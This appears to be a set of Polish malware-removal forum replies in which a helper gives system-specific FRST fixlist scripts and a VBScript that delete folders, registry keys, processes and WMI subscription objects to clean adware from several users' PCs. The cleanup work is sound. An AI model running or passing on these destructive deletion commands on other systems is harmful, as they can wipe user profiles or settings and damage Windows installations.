Settings\berger.XP-75CF98363E2C\Dane aplikacji\HD Tune Pro C:\Documents and Settings\berger.XP-75CF98363E2C\Dane aplikacji\IObit C:\Documents and Settings\berger.XP-75CF98363E2C\Dane aplikacji\KRyLack Archive Password Recovery C:\Documents and Settings\berger.XP-75CF98363E2C\Dane aplikacji\OpenOffice.org C:\Documents and Settings\berger.XP-75CF98363E2C\Dane aplikacji\Podatnik.info C:\Documents and Settings\berger.XP-75CF98363E2C\Dane aplikacji\SolidDocuments C:\Documents and Settings\berger.XP-75CF98363E2C\Dane aplikacji\Thunderbird C:\Documents and Settings\berger.XP-75CF98363E2C\Dane aplikacji\TuneUp Software RemoveDirectory: C:\Documents and Settings\All Users RemoveDirectory: C:\Documents and Settings\All Users.WINDOWS1 RemoveDirectory: C:\Documents and Settings\berger RemoveDirectory: C:\Documents and Settings\berger.XP-75CF98363E2C\Recent(2) RemoveDirectory: C:\Documents and Settings\berger.XP-75CF98363E2C\Dane aplikacji\Mozilla\Firefox\Profiles\7f8o4de8.default-1386175172031\Extensions\{3d7eb24f-2740-49df-8937-200b1cc08f8a}(2) RemoveDirectory: C:\Documents and Settings\berger.XP-75CF98363E2C\Dane aplikacji\Mozilla\Firefox\Profiles\7f8o4de8.default-1386175172031\Extensions\{3d7eb24f-2740-49df-8937-200b1cc08f8a}(3) RemoveDirectory: C:\Documents and Settings\Default User RemoveDirectory: C:\Documents and Settings\Default User.WINDOWS1 CMD: dir /a "C:\Documents and Settings" CMD: dir /a "C:\Documents and Settings\berger.XP-75CF98363E2C\Ustawienia lokalne\Dane aplikacji" EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 4. Start > Uruchom > eventvwr.msc i z prawokliku na sekcje Aplikacja + System wyczyść oba dzienniki. Zresetuj system. 5. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pole Addition, by powstały dwa raporty. Dołącz też plik fixlog.txt.

zubzero0pl, ponawiam prośbę o logi. I opisz w jaki sposób sobie z tym "poradziłeś".

Wszystko nadal aktualne. Logi powyżej usuwam (nie wnoszą nic do sprawy), kompletny obraz uzyskam po przeprowadzeniu podanych akcji.

Akcja wykonana. Skasuj z dysku plik C:\Delfix.txt. Temat rozwiązany. Zamykam.

Wszystko zrobione. AdwCleaner był wcześniej używany, więc ponowne zastosowanie niezasadne. Kończymy: Zastosuj DelFix oraz wyczyść foldery Przywracania systemu: KLIK.

Temat przenoszę do działu diagnostyki malware. Proszę dostarcz obowiązkowe logi: KLIK.

W związku z tym będzie usuwanie siłowe. Akcja: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: R2 Update ace race; C:\Program Files (x86)\ace race\updateacerace.exe [524528 2015-01-05] () R2 Util ace race; C:\Program Files (x86)\ace race\bin\utilacerace.exe [524528 2015-01-05] () BHO-x32: ace race 1.0.0.6 -> {68182220-3c75-49d9-a9c4-4093d3986279} -> C:\Program Files (x86)\ace race\aceracebho.dll (ace race) HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com C:\Program Files (x86)\ace race C:\Program Files (x86)\Opera C:\Program Files (x86)\XTab C:\Users\Kaja\AppData\Local\SlimWare Utilities Inc Reg: reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ace race" /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. W Google Chrome: Ustawienia > karta Ustawienia > Po uruchomieniu > Otwórz konkretną stronę lub zestaw stron > usuń wszystkie wystąpienia adresu isearch.omiga-plus.com, przestaw na "Otwórz stronę nowej karty". 3. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt.

Winsock naprawiony, toteż pojawił się dostęp do internetu. Na razie wstrzymaj się z aktualizacjami Windows, a tym bardziej ponowną instalacją Bitdefender. Musimy dokończyć czyszczenie. Nie jest też wiadome czy ten Bitdefender w ogóle tu gra z systemem, może po jego powrocie znów zamuli wszystko. O tym się przekonasz potem. W tym przypadku wyniki SFC nie mają znaczenia, nie są to rzeczywiste błędy (system je zresztą naprawia "w kółko"). Ten "defekt" opisany jest w tym artykule Microsoftu: KB947595. 2015-01-03 18:29:45, Info CSI 0000021a [sR] Cannot repair member file [l:24{12}]"settings.ini" of Microsoft-Windows-Sidebar, Version = 6.0.6002.18005, pA = PROCESSOR_ARCHITECTURE_INTEL (0), Culture neutral, VersionScope = 1 nonSxS, PublicKeyToken = {l:8 b:31bf3856ad364e35}, Type neutral, TypeName neutral, PublicKey neutral in the store, hash mismatch 2015-01-03 18:29:45, Info CSI 0000021c [sR] Cannot repair member file [l:24{12}]"settings.ini" of Microsoft-Windows-Sidebar, Version = 6.0.6002.18005, pA = PROCESSOR_ARCHITECTURE_INTEL (0), Culture neutral, VersionScope = 1 nonSxS, PublicKeyToken = {l:8 b:31bf3856ad364e35}, Type neutral, TypeName neutral, PublicKey neutral in the store, hash mismatch 2015-01-03 18:29:45, Info CSI 0000021d [sR] This component was referenced by [l:158{79}]"Package_16_for_KB948465~31bf3856ad364e35~x86~~6.0.1.18005.948465-49_neutral_GDR" Skan FRST nie wykazuje, by były jakiekolwiek fitry na urządzeniach CD/DVD. Natomiast po naprawie Winsock było możliwe podejrzenie Dziennika zdarzeń i w nim stał poniższy błąd sterownika SPTD (od emulacji napędów wirtualnych), który to sterownik może negatywnie wpływać na funkcjonowanie urządzeń. Sterownik ten już wyłączyłam i w kolejnym podejściu będzie usuwany na dobre. Tak więc czy w chwili obecnej na pewno są nadal problemy z napędem CD/DVD? System errors: ============= Error: (01/05/2015 08:24:12 PM) (Source: sptd) (EventID: 4) (User: ) Description: Sterownik wykrył błąd wewnętrzny w swoich strukturach danych dla . Kolejna porcja działań poprawkowych: 1. Przegapiłam deinstalację starej wersji Adobe Shockwave Player. 2. Otwórz Notatnik i wklej w nim: strComputer = "." Set objWMIService = GetObject("winmgmts:" _ & "{impersonationLevel=impersonate}!\\" _ & strComputer & "\root\subscription") Set obj1 = objWMIService.Get("__EventFilter.Name='BVTFilter'") set obj2set = obj1.Associators_("__FilterToConsumerBinding") set obj3set = obj1.References_("__FilterToConsumerBinding") For each obj2 in obj2set WScript.echo "Deleting the object" WScript.echo obj2.GetObjectText_ obj2.Delete_ next For each obj3 in obj3set WScript.echo "Deleting the object" WScript.echo obj3.GetObjectText_ obj3.Delete_ next WScript.echo "Deleting the object" WScript.echo obj1.GetObjectText_ obj1.Delete_ Z menu Notatnika > Plik > Zapisz jako > Ustaw rozszerzenie na Wszystkie pliki > Zapisz jako FIX.VBS Plik umieść na Pulpicie. 3. Otwórz Notatnik i wklej w nim: R2 ezSharedSvc; C:\Windows\System32\ezsvc7.dll [129992 2008-02-03] (EasyBits Sofware AS) [File not signed] S4 sptd; C:\Windows\System32\Drivers\sptd.sys [320120 2015-01-05] (Duplex Secure Ltd.) HKLM\...\Run: [installerLauncher] => "C:\Program Files\Common Files\Bitdefender\SetupInformation\{6F57816A-791A-4159-A75F-CFD0C7EA4FBF}\setuplauncher.exe" /run:"C:\Program Files\Common Files\Bitdefender\SetupInformation\{6F57816A-791A-41 (the data entry has 36 more characters). HKU\S-1-5-18\...\Run: [Agent Portfela Bitdefender] => "C:\Program Files\Bitdefender\Bitdefender\pmbxag.exe" HKU\S-1-5-18\...\Run: [Portfel Bitdefender] => "C:\Program Files\Bitdefender\Bitdefender\pwdmanui.exe" --hidden --nowizard HKU\S-1-5-18\...\Run: [Agent aplikacji Portfel Bitdefender] => "C:\Program Files\Bitdefender\Bitdefender\bdapppassmgr.exe" Task: {60075B96-E3CE-4E0A-ADE9-650778797E24} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.6.0_07\bin\jp2ssv.dll No File FF Plugin: @java.com/DTPlugin,version=11.5.2 -> C:\Program Files\Java\jre8\bin\dtplugin\npDeployJava1.dll No File AlternateDataStreams: C:\Users\Madga\Downloads\bitdefender_ts.exe:BDU AlternateDataStreams: C:\Users\Madga\Downloads\Firefox Setup Stub 30.0.exe:BDU AlternateDataStreams: C:\Users\Madga\Downloads\iTunesSetup(2).exe:BDU AlternateDataStreams: C:\Users\Madga\Downloads\jdk-8u5-windows-i586.exe:BDU AlternateDataStreams: C:\Users\Madga\Downloads\MicrosoftFixit.dvd.Run.exe:BDU AlternateDataStreams: C:\Users\Madga\Downloads\sp41377.exe:BDU C:\Program Files\Adobe C:\Program Files\Bitdefender C:\Program Files\Common Files\Adobe C:\Program Files\Common Files\Bitdefender C:\Program Files\ESET C:\Program Files\Java C:\Program Files\OpenOffice.org 3 C:\ProgramData\*.bdinstall.bin C:\ProgramData\Adobe C:\ProgramData\Bitdefender C:\ProgramData\HitmanPro C:\ProgramData\Malwarebytes C:\ProgramData\RogueKiller C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OpenOffice.org 3.0 C:\Users\Madga\AppData\Local\Adobe C:\Users\Madga\AppData\Roaming\Bitdefender C:\Users\Madga\AppData\Roaming\Malwarebytes C:\Users\Madga\AppData\Roaming\QuickScan C:\Windows\System32\ezsvc7.dll C:\Windows\system32\Drivers\hitmanpro37.sys C:\Windows\system32\Drivers\iavtnu.sys C:\Windows\System32\Drivers\sptd.sys C:\Windows\system32\Drivers\TrueSight.sys C:\Windows\system32\Adobe C:\Windows\system32\Macromed\Flash Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\services\gupdate" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\services\gupdatem" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\services\gusvc" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\services\HWDeviceService.exe" /f CMD: C:\Users\Madga\Desktop\FIX.VBS EmptyTemp: Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Nastąpi restart. Powstanie kolejny fixlog.txt. 4. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt.